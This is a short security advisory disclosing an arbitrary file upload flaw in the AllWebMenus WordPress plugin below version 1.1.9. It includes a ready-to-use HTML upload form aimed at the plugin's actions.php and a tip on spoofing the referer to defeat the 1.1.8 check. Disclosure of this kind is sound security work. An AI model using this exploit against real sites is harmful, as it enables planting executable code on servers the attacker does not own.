WordPress Plugin AllWebMenus < 1.1.9 Menu Plugin - Arbitrary File Upload

Related Vulnerabilities: CVE-2012-1011   CVE-2012-1010  
Publish Date: 22 Jan 2012
Author: 6Scan
                #Exploit Title: AllWebMenus WordPress Menu Plugin Arbitrary file upload
#Version:  &lt; 1.1.9
#Date: 2012-01-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/
#Official fix: This advisory is released after the vendor was contacted and fixed the issue promptly.
#Description:  Unauthorized users could upload arbitrary files to the vulnerable server, potentially executing commands

AllWebMenus WordPress Menu Plugin
&lt;1.1.8  Remote File upload

On versions &lt; 1.1.8 , lack of checks in script actions.php allowed malicious user to upload any file to the vulnerable server.
Create a file (For example, Wordpress_security.php , with this content &lt;?php echo '6Scan to the rescue';  ?&gt; )
Compress it with zip to awm.zip

Use this form to upload the php file to the server

&lt;form action="http://server/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php" method=post enctype="multipart/form-data"&gt;
&lt;input type="file" name="awm1" size=100&gt;
&lt;input type="hidden" name="AWM_menu_id" value="2134234"&gt;
&lt;input type="hidden" name="theaction" value="zip_update"&gt;
&lt;input type=submit&gt;
&lt;/form&gt;


Version 1.1.8 also checks the source referrer, so you have to use scripting language (or spoof it in another way) to set the HTTP_REFERER to 
"wp-admin/options-general.php?page=allwebmenus-wordpress-menu-plugin/allwebmenus-wordpress-menu.php"